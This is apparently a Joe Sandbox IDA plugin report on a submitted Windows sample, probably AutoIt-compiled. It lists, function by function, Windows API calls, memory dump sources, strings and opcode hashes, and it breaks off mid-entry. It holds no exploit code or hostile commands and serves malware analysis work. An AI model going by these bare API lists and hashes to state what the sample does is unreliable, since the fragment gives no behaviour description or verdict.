                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                            • _wcslen.LIBCMT ref: 00467793
                                                            • _wcscpy.LIBCMT ref: 00467641
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • _wcslen.LIBCMT ref: 004677BD
                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                              • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                            • String ID: X
                                                            • API String ID: 3104067586-3081909835
                                                            • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                            • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                            • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                            • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                            • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                            • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                            • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                            • _wcslen.LIBCMT ref: 0046CDB0
                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                            • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                            • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                              • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                              • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                              • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                            Strings
                                                            • NULL Pointer assignment, xrefs: 0046CEA6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                            • String ID: NULL Pointer assignment
                                                            • API String ID: 440038798-2785691316
                                                            • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                            • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                            • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                            • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                            • _wcslen.LIBCMT ref: 004610A3
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                            • GetWindowRect.USER32(?,?), ref: 00461248
                                                              • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                            • String ID: ThumbnailClass
                                                            • API String ID: 4136854206-1241985126
                                                            • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                            • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                            • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                            • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                            APIs
                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                            • GetClientRect.USER32(?,?), ref: 00471A1A
                                                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                            • DestroyIcon.USER32(?), ref: 00471AF4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                            • String ID: 2
                                                            • API String ID: 1331449709-450215437
                                                            • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                            • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                            • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                            • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                            • __swprintf.LIBCMT ref: 00460915
                                                            • __swprintf.LIBCMT ref: 0046092D
                                                            • _wprintf.LIBCMT ref: 004609E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                            • API String ID: 3054410614-2561132961
                                                            • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                            • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                            • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                            • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                            • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                            • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                            • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 600699880-22481851
                                                            • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                            • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                            • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                            • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: DestroyWindow
                                                            • String ID: static
                                                            • API String ID: 3375834691-2160076837
                                                            • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                            • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                            • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                            • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                            • API String ID: 2907320926-3566645568
                                                            • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                            • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                            • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                            • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                            APIs
                                                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                            • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                            • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                            • DeleteObject.GDI32(00000000), ref: 00470A04
                                                            • DestroyIcon.USER32(00790053), ref: 00470A1C
                                                            • DeleteObject.GDI32(2EB2D464), ref: 00470A34
                                                            • DestroyWindow.USER32(004D0041), ref: 00470A4C
                                                            • DestroyIcon.USER32(?), ref: 00470A73
                                                            • DestroyIcon.USER32(?), ref: 00470A81
                                                            • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 1237572874-0
                                                            • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                            • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                            • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                            • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                            • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                            • VariantInit.OLEAUT32(?), ref: 004793E1
                                                            • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                            • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                            • VariantClear.OLEAUT32(?), ref: 00479489
                                                            • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                            • VariantClear.OLEAUT32(?), ref: 004794CA
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                            • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                            • Opcode Fuzzy Hash: 23f20de2412018a08f4578d4e0f12eac70a18aacfa0f9406534bc12fd33cd3b0
                                                            • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0044480E
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                            • GetKeyState.USER32(000000A0), ref: 004448AA
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                            • GetKeyState.USER32(000000A1), ref: 004448D9
                                                            • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                            • GetKeyState.USER32(00000011), ref: 00444903
                                                            • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                            • GetKeyState.USER32(00000012), ref: 0044492D
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                            • GetKeyState.USER32(0000005B), ref: 00444958
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                            • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                            • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                            • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                            • String ID:
                                                            • API String ID: 3413494760-0
                                                            • Opcode ID: 8449772dd4c4864e53668d518338167b5f7124ec3e85df06159a96bd08f47b13
                                                            • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                            • Opcode Fuzzy Hash: 8449772dd4c4864e53668d518338167b5f7124ec3e85df06159a96bd08f47b13
                                                            • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AddressProc_free_malloc$_strcat_strlen
                                                            • String ID: AU3_FreeVar
                                                            • API String ID: 2634073740-771828931
                                                            • Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                            • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                            • Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                            • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                            APIs
                                                            • CoInitialize.OLE32 ref: 0046C63A
                                                            • CoUninitialize.OLE32 ref: 0046C645
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                              • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                            • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                            • IIDFromString.OLE32(?,?), ref: 0046C705
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
